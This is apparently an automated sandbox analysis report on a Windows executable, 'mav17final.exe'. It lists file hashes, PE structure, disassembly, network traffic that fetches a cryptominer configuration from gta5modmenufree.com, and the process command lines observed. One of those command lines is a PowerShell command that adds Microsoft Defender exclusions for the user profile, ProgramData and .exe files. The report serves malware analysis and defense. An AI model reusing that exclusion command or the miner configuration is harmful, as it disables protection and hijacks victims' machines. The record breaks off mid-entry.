                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5290264
                                                Entropy (8bit):6.532307554125056
                                                Encrypted:false
                                                SSDEEP:98304:CoTBOZ1ed7R/gyE5hIblWsTvMq/tjafGriRNUP8lw:CoTBOvayyE3IblWKPljafGDaw
                                                MD5:0BCBEA7313655A42ECC0A1FDBCF37993
                                                SHA1:4262E7F1A051C50C0145CE932EC261E6B93F387E
                                                SHA-256:B63F00D14E4EDC4A5B63E48D3836DA41D3567BBEACB84322B054DD5B2A25A600
                                                SHA-512:11D99F7E31E65A3A0E2C63AAA9F0476EF3835BBBB96181043A642AC11503E7DA3DED331E5FD0F5D4A66951F674C14B6693434DE337B35ED77AFE0E21D49B3B7E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 79%
                                                 • Antivirus: Virustotal, Detection: 65%
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Gf.........."...........O.....@..........@..............................Q...........`.....................................................<.............P.......P..)....Q.h...............................(.......8............................................text...f........................... ..`.rdata..|B.......D..................@..@.data.....O.......O.................@....pdata........P.......P.............@..@.00cfg........P.......P.............@..@.tls..........P.......P.............@....reloc..h.....Q.......P.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):2.0
                                                Encrypted:false
                                                SSDEEP:3:qn:qn
                                                MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                Malicious:false
                                                Preview:blat
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1510207563435464
                                                Encrypted:false
                                                SSDEEP:3:NlllulvX/Z:NllUvX
                                                MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                Malicious:false
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\ProgramData\dialer.exe
                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):14544
                                                Entropy (8bit):6.2660301556221185
                                                Encrypted:false
                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                Malicious:true
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Entropy (8bit):7.974540085861685
                                                TrID:
                                                • Win64 Executable GUI (202006/5) 77.37%
                                                • InstallShield setup (43055/19) 16.49%
                                                • Win64 Executable (generic) (12005/4) 4.60%
                                                • Generic Win/DOS Executable (2004/3) 0.77%
                                                • DOS Executable Generic (2002/1) 0.77%
                                                File name:mav17final.exe
                                                File size:13'827'522 bytes
                                                MD5:9e77a1c36b7ee264c38b958963769c08
                                                SHA1:eb7ad58040a6dbf826a37d52c26f7ce8ef963342
                                                SHA256:f1836d3e4c6916cdc1f873b430d0a2784885e587683f6917fd51c04eba18933c
                                                SHA512:cb4867e6d1eac352c59285e5b51128a54347e0780826b9c8221e516d650aa815d518591c8d4594a09b0ef331da29a9b49c0cab47987d035abda32f599be06cff
                                                SSDEEP:196608:XiwmU0yb8PHvOzg5dpsYjAu3toeQXs5S+9HIG3/htx4FMIZETSvjPePdrQJ/B2nw:ywuky7h/QXs4+9H7/DxQETSvvJsWp1
                                                TLSH:09D6338AE1B149D9D8538138E0D7D814EA72A877173CA2CB07F8645A1F93DA5B43FF60
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f.................................................................................!...n.......n.......Rich...................
                                                Icon Hash:4a464cd47461e179
                                                Entrypoint:0x14000c120
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x140000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6647B2D2 [Fri May 17 19:41:06 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:2
                                                File Version Major:5
                                                File Version Minor:2
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:2
                                                Import Hash:8cab86c0c05962691d7150b4577bcb22
                                                Instruction
                                                dec eax
                                                sub esp, 28h
                                                call 00007F66707FC5FCh
                                                dec eax
                                                add esp, 28h
                                                jmp 00007F66707FC20Fh
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                dec eax
                                                sub esp, 28h
                                                call 00007F66707FCB6Ch
                                                test eax, eax
                                                je 00007F66707FC3B3h
                                                dec eax
                                                mov eax, dword ptr [00000030h]
                                                dec eax
                                                mov ecx, dword ptr [eax+08h]
                                                jmp 00007F66707FC397h
                                                dec eax
                                                cmp ecx, eax
                                                je 00007F66707FC3A6h
                                                xor eax, eax
                                                dec eax
                                                cmpxchg dword ptr [0002F2ECh], ecx
                                                jne 00007F66707FC380h
                                                xor al, al
                                                dec eax
                                                add esp, 28h
                                                ret
                                                mov al, 01h
                                                jmp 00007F66707FC389h
                                                int3
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                dec eax
                                                sub esp, 20h
                                                movzx eax, byte ptr [0002F2D7h]
                                                test ecx, ecx
                                                mov ebx, 00000001h
                                                cmove eax, ebx
                                                mov byte ptr [0002F2C7h], al
                                                call 00007F66707FC973h
                                                call 00007F66707FD8A6h
                                                test al, al
                                                jne 00007F66707FC396h
                                                xor al, al
                                                jmp 00007F66707FC3A6h
                                                call 00007F66708065A1h
                                                test al, al
                                                jne 00007F66707FC39Bh
                                                xor ecx, ecx
                                                call 00007F66707FD8B6h
                                                jmp 00007F66707FC37Ch
                                                mov al, bl
                                                dec eax
                                                add esp, 20h
                                                pop ebx
                                                ret
                                                int3
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                dec eax
                                                sub esp, 20h
                                                cmp byte ptr [0002F28Ch], 00000000h
                                                mov ebx, ecx
                                                jne 00007F66707FC3F9h
                                                cmp ecx, 01h
                                                jnbe 00007F66707FC3FCh
                                                call 00007F66707FCAD2h
                                                test eax, eax
                                                je 00007F66707FC3BAh
                                                 Name                                  Virtual Address  Virtual Size  Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT          0x37698          0x78          .rdata
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE        0x40000          0xf41c        .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x3d000          0x1f8c        .pdata
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC       0x50000          0x744         .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG           0x35240          0x1c          .rdata
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x35260          0x138         .rdata
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_IAT             0x26000          0x3f0         .rdata
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                 Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type                                                                                              Entropy             Characteristics
                                                 .text   0x1000           0x24a50       0x24c00   190401f1858eb6aaed68cca57ff70033  False     0.5661405187074829   data                                                                                                   6.455391595300264   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .rdata  0x26000          0x12436       0x12600   abc6ef004a61808e8c901134e626778d  False     0.5113732993197279   data                                                                                                   5.80002704943681    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .data   0x39000          0x32d8        0xe00     dac4e1626398bdbc8a43bbcc545bcd82  False     0.12081473214285714  Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0  1.6410831953198595  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                 .pdata  0x3d000          0x1f8c        0x2000    c6a690e6bf8e4d77e321ba617d08976c  False     0.4898681640625      data                                                                                                   5.373634709528991   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 _RDATA  0x3f000          0xf4          0x200     b24eb920d09e236e1ccadd6d5fcfc5e5  False     0.30078125           data                                                                                                   1.9987359274801832  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .rsrc   0x40000          0xf41c        0xf600    487cbb22a6e528b8aebe8a492c305f70  False     0.8030360772357723   data                                                                                                   7.554916050251791   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc  0x50000          0x744         0x800     72cbe79325b6c2b3fedfaab9b7d68de5  False     0.54736328125        data                                                                                                   5.2312775503476825  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 Name           RVA      Size    Type                                                           Language  Country  ZLIB Complexity
                                                 RT_ICON        0x40208  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0                     0.585820895522388
                                                 RT_ICON        0x410b0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0                     0.7360108303249098
                                                 RT_ICON        0x41958  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0                     0.755057803468208
                                                 RT_ICON        0x41ec0  0x952c  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                      0.9975384937676757
                                                 RT_ICON        0x4b3ec  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0                    0.3887966804979253
                                                 RT_ICON        0x4d994  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0                    0.49530956848030017
                                                 RT_ICON        0x4ea3c  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0                    0.7207446808510638
                                                 RT_GROUP_ICON  0x4eea4  0x68    data                                                                             0.7019230769230769
                                                 RT_MANIFEST    0x4ef0c  0x50d   XML 1.0 document, ASCII text                                                     0.4694508894044857
                                                 DLL           Import
                                                 USER32.dll    CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                 COMCTL32.dll  (no named imports listed)
                                                 KERNEL32.dll  IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RaiseException, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, CompareStringW, LCMapStringW
                                                 ADVAPI32.dll  OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                 GDI32.dll     SelectObject, DeleteObject, CreateFontIndirectW
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 22, 2024 06:46:09.706837893 CEST | 52732 | 53 | 192.168.2.5 | 1.1.1.1
May 22, 2024 06:46:09.741910934 CEST | 53 | 52732 | 1.1.1.1 | 192.168.2.5

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 22, 2024 06:46:09.706837893 CEST | 192.168.2.5 | 1.1.1.1 | 0xec6b | Standard query (0) | gta5modmenufree.com | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 22, 2024 06:46:09.741910934 CEST | 1.1.1.1 | 192.168.2.5 | 0xec6b | No error (0) | gta5modmenufree.com | (none) | 188.114.96.3 | A (IP address) | IN (0x0001) | false
May 22, 2024 06:46:09.741910934 CEST | 1.1.1.1 | 192.168.2.5 | 0xec6b | No error (0) | gta5modmenufree.com | (none) | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                • gta5modmenufree.com
HTTPS session

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 2804 | C:\Windows\System32\dwm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-22 04:46:10 UTC | 129 | OUT | GET /CSHQRtZu/standingcpu HTTP/1.1
Accept: */*
Connection: close
Host: gta5modmenufree.com
User-Agent: cpp-httplib/0.12.6
2024-05-22 04:46:10 UTC | 557 | IN | HTTP/1.1 200 OK
Date: Wed, 22 May 2024 04:46:10 GMT
Content-Type: text/plain
Content-Length: 364
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecb9MnK2IYkrgx5gwynxGksU8JuYNTsCKa28ajh4f4qHVHqtdgKyErkXaIh7w%2BsrAWDOkfFRyM%2FfhbsUQimpHnqQVI%2FdtHYAhXwMWLhGAa0Qj93fND31nqggOOUKk%2FpKNlSVjV0T"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 887a2932aefe6a4e-EWR
alt-svc: h3=":443"; ma=86400
2024-05-22 04:46:10 UTC | 364 | IN | Data Raw: 7b 0d 0a 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 22 70 6f 6f 6c 22 3a 20 22 37 37 2e 31 30 35 2e 31 36 36 2e 31 37 39 22 2c 0d 0a 22 70 6f 72 74 22 3a 20 37 37 35 32 2c 0d 0a 22 77 61 6c 6c 65 74 22 3a 20 22 73 74 61 6e 64 69 6e 67 63 70 75 22 2c 0d 0a 22 70 61 73 73 77 6f 72 64 22 3a 20 22 73 74 61 6e 64 69 6e 67 63 70 75 22 2c 0d 0a 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0d 0a 22 6d 61 78 2d 63 70 75 22 3a 20 33 35 2c 0d 0a 22 69 64 6c 65 2d 77 61 69 74 22 3a 20 34 2c 0d 0a 22 69 64 6c 65 2d 63 70 75 22 3a 20 38 30 2c 0d 0a 22 73 74 65 61 6c 74 68 2d 74 61 72 67 65 74 73 22 3a 20 22 54 61 73 6b 6d 67 72 2e 65 78 65 2c 50
Data Ascii: {"algo": "rx/0","pool": "77.105.166.179","port": 7752,"wallet": "standingcpu","password": "standingcpu","nicehash": true,"ssltls": true,"keepalive": true,"max-cpu": 35,"idle-wait": 4,"idle-cpu": 80,"stealth-targets": "Taskmgr.exe,P


                                                Target ID:0
                                                Start time:00:45:55
                                                Start date:22/05/2024
                                                Path:C:\Users\user\Desktop\mav17final.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\mav17final.exe"
                                                Imagebase:0x7ff79ea40000
                                                File size:13'827'522 bytes
                                                MD5 hash:9E77A1C36B7EE264C38B958963769C08
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:00:45:55
                                                Start date:22/05/2024
                                                Path:C:\Users\user\Desktop\mav17final.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\mav17final.exe"
                                                Imagebase:0x7ff79ea40000
                                                File size:13'827'522 bytes
                                                MD5 hash:9E77A1C36B7EE264C38B958963769C08
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
